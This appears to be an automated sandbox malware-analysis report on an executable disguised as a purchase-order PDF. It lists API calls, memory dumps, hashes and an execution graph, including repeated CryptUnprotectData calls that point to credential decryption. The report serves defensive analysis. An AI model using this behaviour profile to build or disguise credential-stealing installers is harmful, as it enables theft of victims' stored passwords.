                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204672986.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CharPrevlstrcatlstrlen
                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                    • API String ID: 2659869361-823278215
                                                                                                                                    • Opcode ID: 69ce20dac70bd98cff0fbc611a97eee619d910519d07cd3d76554ab653056bec
                                                                                                                                    • Instruction ID: 6c4fcacab342d11fcc3e0291a3358bee332e4b98312e181ff459d3a43eef6c86
                                                                                                                                    • Opcode Fuzzy Hash: 69ce20dac70bd98cff0fbc611a97eee619d910519d07cd3d76554ab653056bec
                                                                                                                                    • Instruction Fuzzy Hash: E4D0A771101D306AC211EB548C04DDF72ACAE45344381007BF502B30E1CB7C1D618BFE
                                                                                                                                    APIs
                                                                                                                                    • GlobalFree.KERNEL32(007566E8), ref: 00401BA7
                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,00000804), ref: 00401BB9
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2204558947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2204544502.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204575832.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204672986.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Global$AllocFree
                                                                                                                                    • String ID: Call$fu
                                                                                                                                    • API String ID: 3394109436-3148595044
                                                                                                                                    • Opcode ID: 3223036e7e2fecee151538c34771c34e58526c9ebab93d957a64f6eea7189736
                                                                                                                                    • Instruction ID: 27804974e3ca03393c04398de70bc6092cde1ed56c9d8f76027c1228d60f226a
                                                                                                                                    • Opcode Fuzzy Hash: 3223036e7e2fecee151538c34771c34e58526c9ebab93d957a64f6eea7189736
                                                                                                                                    • Instruction Fuzzy Hash: 32219072600101EBCB10EFA4CE85E5F77BAAF45324725413BF116B32D1DA78A8519B1D
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 004051B4: lstrlenW.KERNEL32(0042C248,00000000,0041D820,759223A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051EC
                                                                                                                                      • Part of subcall function 004051B4: lstrlenW.KERNEL32(0040318B,0042C248,00000000,0041D820,759223A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051FC
                                                                                                                                      • Part of subcall function 004051B4: lstrcatW.KERNEL32(0042C248,0040318B,0040318B,0042C248,00000000,0041D820,759223A0), ref: 0040520F
                                                                                                                                      • Part of subcall function 004051B4: SetWindowTextW.USER32(0042C248,0042C248), ref: 00405221
                                                                                                                                      • Part of subcall function 004051B4: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405247
                                                                                                                                      • Part of subcall function 004051B4: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405261
                                                                                                                                      • Part of subcall function 004051B4: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526F
                                                                                                                                      • Part of subcall function 00405735: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430270,Error launching installer), ref: 0040575E
                                                                                                                                      • Part of subcall function 00405735: CloseHandle.KERNEL32(0040A300), ref: 0040576B
                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E95
                                                                                                                                    • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401EAA
                                                                                                                                    • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EB7
                                                                                                                                    • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EDE
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2204558947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2204544502.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204575832.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204672986.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3585118688-0
                                                                                                                                    • Opcode ID: b55d93dfb97ddf8a14339bcde7d47e4fb5e20aa6c656398e0056b6fada52b68e
                                                                                                                                    • Instruction ID: 13991b0c54685da06ec2ee4a2e862f8a6615163aea1ca29b4ebe34551147a3b8
                                                                                                                                    • Opcode Fuzzy Hash: b55d93dfb97ddf8a14339bcde7d47e4fb5e20aa6c656398e0056b6fada52b68e
                                                                                                                                    • Instruction Fuzzy Hash: DE116131900508EBCF21AFA1CD459AE7BB6EF44354F24403BF901BA1E1D7798A919B9D
                                                                                                                                    APIs
                                                                                                                                    • DestroyWindow.USER32(00000000,00000000,00402F6A,?,?,?,00000000,0040353A,?), ref: 00402D9D
                                                                                                                                    • GetTickCount.KERNEL32 ref: 00402DBB
                                                                                                                                    • CreateDialogParamW.USER32(0000006F,00000000,00402D04,00000000), ref: 00402DD8
                                                                                                                                    • ShowWindow.USER32(00000000,00000005,?,?,00000000,0040353A,?), ref: 00402DE6
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2204558947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2204544502.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204575832.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204672986.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2102729457-0
                                                                                                                                    • Opcode ID: 4531d39793dd689b88ecf9c78e53bc84b8350a2634ed7edc8c543d9bb047c671
                                                                                                                                    • Instruction ID: 14797c98da9828bb931948049190d252b5e763d0d3dd0a8fb7bf7e32741345ac
                                                                                                                                    • Opcode Fuzzy Hash: 4531d39793dd689b88ecf9c78e53bc84b8350a2634ed7edc8c543d9bb047c671
                                                                                                                                    • Instruction Fuzzy Hash: C9F05430611A20BFC6716B50FF4D98B7B64BB84B11701457AF142B15E8CBB80C418B9C
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00406055: lstrcpynW.KERNEL32(0040A300,0040A300,00000400,00403350,00433F00,NSIS Error), ref: 00406062
                                                                                                                                      • Part of subcall function 00405AB4: CharNextW.USER32(?,?,0042FA70,0040A300,00405B28,0042FA70,0042FA70,75923420,?,C:\Users\user\AppData\Local\Temp\,00405866,?,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe"), ref: 00405AC2
                                                                                                                                      • Part of subcall function 00405AB4: CharNextW.USER32(00000000), ref: 00405AC7
                                                                                                                                      • Part of subcall function 00405AB4: CharNextW.USER32(00000000), ref: 00405ADF
                                                                                                                                    • lstrlenW.KERNEL32(0042FA70,00000000,0042FA70,0042FA70,75923420,?,C:\Users\user\AppData\Local\Temp\,00405866,?,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe"), ref: 00405B6A
                                                                                                                                    • GetFileAttributesW.KERNEL32(0042FA70,0042FA70,0042FA70,0042FA70,0042FA70,0042FA70,00000000,0042FA70,0042FA70,75923420,?,C:\Users\user\AppData\Local\Temp\,00405866,?,75923420,C:\Users\user\AppData\Local\Temp\), ref: 00405B7A
                                                                                                                                    Strings
                                                                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00405B11
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2204558947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2204544502.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204575832.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204672986.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                    • API String ID: 3248276644-823278215
                                                                                                                                    • Opcode ID: c6e1c51320233fe3a8d28f86eff4fa9f75d9a909d4c49901629be8da40a5a1bd
                                                                                                                                    • Instruction ID: 9ab821bc962df094d04e13ee53e7cef05d0bc350337be3d6547239d71e0b1b07
                                                                                                                                    • Opcode Fuzzy Hash: c6e1c51320233fe3a8d28f86eff4fa9f75d9a909d4c49901629be8da40a5a1bd
                                                                                                                                    • Instruction Fuzzy Hash: FFF0A429504E5115D72272361D49EBF3669CF86324B1A063FF852B22D1DB3CB952CCBD
                                                                                                                                    APIs
                                                                                                                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430270,Error launching installer), ref: 0040575E
                                                                                                                                    • CloseHandle.KERNEL32(0040A300), ref: 0040576B
                                                                                                                                    Strings
                                                                                                                                    • Error launching installer, xrefs: 00405748
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2204558947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2204544502.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204575832.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204672986.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CloseCreateHandleProcess
                                                                                                                                    • String ID: Error launching installer
                                                                                                                                    • API String ID: 3712363035-66219284
                                                                                                                                    • Opcode ID: d9d25ead1e61dd1de32296c4779b051624e3cc0dc0aa34a2348a33ced0ef8ad4
                                                                                                                                    • Instruction ID: 39588cd766b2ea89d65183b6a6bcc828c6470883592abd44c37ede1670716c40
                                                                                                                                    • Opcode Fuzzy Hash: d9d25ead1e61dd1de32296c4779b051624e3cc0dc0aa34a2348a33ced0ef8ad4
                                                                                                                                    • Instruction Fuzzy Hash: B8E0B6B4600209BFEB109B64ED49F7B7AADEB04708F004665BD50F6191DB74EC158B78
                                                                                                                                    APIs
                                                                                                                                    • FreeLibrary.KERNEL32(?,75923420,00000000,C:\Users\user\AppData\Local\Temp\,004037E1,004035F6,?), ref: 00403823
                                                                                                                                    • GlobalFree.KERNEL32(?), ref: 0040382A
                                                                                                                                    Strings
                                                                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00403809
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2204558947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2204544502.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204575832.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204672986.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Free$GlobalLibrary
                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                    • API String ID: 1100898210-823278215
                                                                                                                                    • Opcode ID: 5898abf10019027861f76b75f8a0bd4982bc330ca6c5028dc7fe5a6e65d5b297
                                                                                                                                    • Instruction ID: 1a021970d57ae41c51ef9a97853206db199f5c9852ffd88fd16926185a7b9e14
                                                                                                                                    • Opcode Fuzzy Hash: 5898abf10019027861f76b75f8a0bd4982bc330ca6c5028dc7fe5a6e65d5b297
                                                                                                                                    • Instruction Fuzzy Hash: 72E0EC3350162097C7216F55BD08B6AB7ACAF4DB22F4584BAE880BB2608B745C428BD8
                                                                                                                                    APIs
                                                                                                                                    • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402E5A,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe,C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe,80000000,00000003,?,?,00000000,0040353A,?), ref: 00405A5B
                                                                                                                                    • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402E5A,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe,C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe,80000000,00000003,?,?,00000000,0040353A,?), ref: 00405A6B
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2204558947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2204544502.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204575832.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204672986.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CharPrevlstrlen
                                                                                                                                    • String ID: C:\Users\user\Desktop
                                                                                                                                    • API String ID: 2709904686-1246513382
                                                                                                                                    • Opcode ID: 2f3bd6b78df313aedfed625dab12a62b748c0839e8540faa9dae91e8a46bacba
                                                                                                                                    • Instruction ID: bc07cd37d8a58f62a2b9a6dad95115890aa924a9f687d43278fd1307a4d4e217
                                                                                                                                    • Opcode Fuzzy Hash: 2f3bd6b78df313aedfed625dab12a62b748c0839e8540faa9dae91e8a46bacba
                                                                                                                                    • Instruction Fuzzy Hash: 7ED05EB2400D209AD312A714DC84DAF77ACEF1530074A446BF441A31A0D7785D918AA9
                                                                                                                                    APIs
                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 1000116A
                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 100011C7
                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 100011D9
                                                                                                                                    • GlobalFree.KERNEL32(?), ref: 10001203
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2206700289.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2206687623.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2206712677.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2206725097.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_10000000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Global$Free$Alloc
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1780285237-0
                                                                                                                                    • Opcode ID: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                                                                                                                    • Instruction ID: f345eba8489605592ce73ef35c78e6b42925bf5f5eceaf1f60f0973e38c56604
                                                                                                                                    • Opcode Fuzzy Hash: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                                                                                                                    • Instruction Fuzzy Hash: AE318FF6904211DBF314CF64DC859EA77E8EB853D0B12452AFB45E726CEB34E8018765
                                                                                                                                    APIs
                                                                                                                                    • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B9F
                                                                                                                                    • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405BB7
                                                                                                                                    • CharNextA.USER32(00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BC8
                                                                                                                                    • lstrlenA.KERNEL32(00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BD1
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2204558947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2204544502.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204575832.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204672986.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 190613189-0
                                                                                                                                    • Opcode ID: c22d3165051237620b2fbf365f01d50e367ccce7d83d9982a11a9c9d857fbe9e
                                                                                                                                    • Instruction ID: ee410971918da6c20df7c5ac797640abd601cb5b02c8e88895b13af08820b85c
                                                                                                                                    • Opcode Fuzzy Hash: c22d3165051237620b2fbf365f01d50e367ccce7d83d9982a11a9c9d857fbe9e
                                                                                                                                    • Instruction Fuzzy Hash: 22F06231104958AFC7029BA5DD4099FBBB8EF55254B2540A9E840F7211D674FE019BA9

                                                                                                                                    Execution Graph

                                                                                                                                    Execution Coverage:12.4%
                                                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                                                    Signature Coverage:3.1%
                                                                                                                                    Total number of Nodes:196
                                                                                                                                    Total number of Limit Nodes:15
                                                                                                                                    execution_graph 44885 35e620c0 44887 35e620ed 44885->44887 44886 35e6213c 44887->44886 44889 35e617fc 44887->44889 44890 35e61807 44889->44890 44895 35e617d0 44890->44895 44892 35e6229c 44899 359395e8 44892->44899 44893 35e622a5 44893->44886 44896 35e617db 44895->44896 44903 35e6181c 44896->44903 44898 35e622f5 44898->44892 44900 359395f3 44899->44900 44902 3593ec47 44900->44902 44907 3593e7f4 44900->44907 44902->44893 44905 35e61827 44903->44905 44904 35e6248b 44904->44898 44905->44904 44906 35e62461 GetCurrentThreadId 44905->44906 44906->44904 44909 3593e7ff 44907->44909 44908 3593f111 44908->44902 44909->44908 44911 3593fab0 44909->44911 44913 3593fadb 44911->44913 44912 3593fb8a 44912->44912 44913->44912 44915 35e600c0 44913->44915 44919 35e60110 44915->44919 44923 35e6010d 44915->44923 44920 35e60178 CreateWindowExW 44919->44920 44922 35e60234 44920->44922 44922->44922 44924 35e60178 CreateWindowExW 44923->44924 44926 35e60234 44924->44926 44927 35e62020 SetTimer 44928 35e6208c 44927->44928 44929 ad030 44930 ad048 44929->44930 44931 ad0a2 44930->44931 44935 35e602b7 44930->44935 44939 35e602c8 44930->44939 44943 35e61bd0 44930->44943 44936 35e602ee 44935->44936 44938 35e61bd0 2 API calls 44936->44938 44937 35e6030f 44937->44931 44938->44937 44940 35e602ee 44939->44940 44942 35e61bd0 2 API calls 44940->44942 44941 35e6030f 44941->44931 44942->44941 44944 35e61bfd 44943->44944 44945 35e61c2f 44944->44945 44949 35e61d58 44944->44949 44958 35e69b38 44944->44958 44962 35e69b48 44944->44962 44950 35e61d66 44949->44950 44951 35e61d93 44949->44951 44953 35e61d6e 44950->44953 44966 35e61dc0 44950->44966 44951->44950 44952 35e61d98 44951->44952 44954 35e617d0 GetCurrentThreadId 44952->44954 44953->44945 44955 35e61da4 44954->44955 44955->44945 44960 35e69b48 44958->44960 44959 35e69be8 44959->44945 44970 35e69c00 44960->44970 44964 35e69b5c 44962->44964 44963 35e69be8 44963->44945 44965 35e69c00 CallWindowProcW 44964->44965 44965->44963 44967 35e61e02 44966->44967 44969 35e61dac 44966->44969 44968 35e61e5a CallWindowProcW 44967->44968 44967->44969 44968->44969 44969->44945 44971 35e69c11 44970->44971 44973 35e6b040 44970->44973 44971->44959 44975 35e61dc0 CallWindowProcW 44973->44975 44974 35e6b05a 44974->44971 44975->44974 44976 15b158 44977 15b174 44976->44977 44985 32b30198 44977->44985 44989 32b30188 44977->44989 44978 15b1a3 44993 3593bd48 44978->44993 44986 32b301a4 44985->44986 45003 32b3c638 44986->45003 44987 32b301da 44987->44978 44990 32b301a4 44989->44990 44992 32b3c638 CryptUnprotectData 44990->44992 44991 32b301da 44991->44978 44992->44991 44994 3593bd54 44993->44994 45035 3593bda9 44994->45035 44997 35e62730 44998 35e6273f 44997->44998 45056 35e60938 44998->45056 45005 32b3c642 45003->45005 45004 32b3caf9 45004->44987 45005->45004 45007 32b3cf01 45005->45007 45008 32b3cf10 45007->45008 45012 32b3d550 45008->45012 45020 32b3d540 45008->45020 45009 32b3cf80 45009->45005 45013 32b3d575 45012->45013 45014 32b3d629 45012->45014 45013->45014 45018 32b3d550 CryptUnprotectData 45013->45018 45019 32b3d540 CryptUnprotectData 45013->45019 45028 32b3d730 45013->45028 45032 32b3d1ec 45014->45032 45018->45014 45019->45014 45021 32b3d550 45020->45021 45022 32b3d629 45021->45022 45025 32b3d730 CryptUnprotectData 45021->45025 45026 32b3d550 CryptUnprotectData 45021->45026 45027 32b3d540 CryptUnprotectData 45021->45027 45023 32b3d1ec CryptUnprotectData 45022->45023 45024 32b3d7f5 45023->45024 45024->45009 45025->45022 45026->45022 45027->45022 45029 32b3d745 45028->45029 45030 32b3d1ec CryptUnprotectData 45029->45030 45031 32b3d7f5 45030->45031 45031->45014 45033 32b3d9e0 CryptUnprotectData 45032->45033 45034 32b3d7f5 45033->45034 45034->45009 45036 3593bdb4 45035->45036 45039 3593ce60 45036->45039 45037 15b1aa 45037->44997 45040 3593ce7c 45039->45040 45043 359394b4 45040->45043 45042 3593ce9b 45042->45037 45044 359394bf 45043->45044 45047 3593cf4f 45044->45047 45048 3593cf59 45044->45048 45052 3593cf68 45044->45052 45047->45042 45049 3593cf67 45048->45049 45050 3593d021 45049->45050 45051 359395e8 2 API calls 45049->45051 45051->45050 45054 3593cf96 45052->45054 45053 3593d021 45053->45053 45054->45053 45055 359395e8 2 API calls 45054->45055 45055->45053 45057 35e60948 45056->45057 45058 35e60965 45057->45058 45064 35e60980 45057->45064 45060 35e6188c 45058->45060 45062 35e61897 45060->45062 45063 35e62866 45062->45063 45083 35e61934 45062->45083 45065 35e609c6 GetCurrentProcess 45064->45065 45067 35e60a11 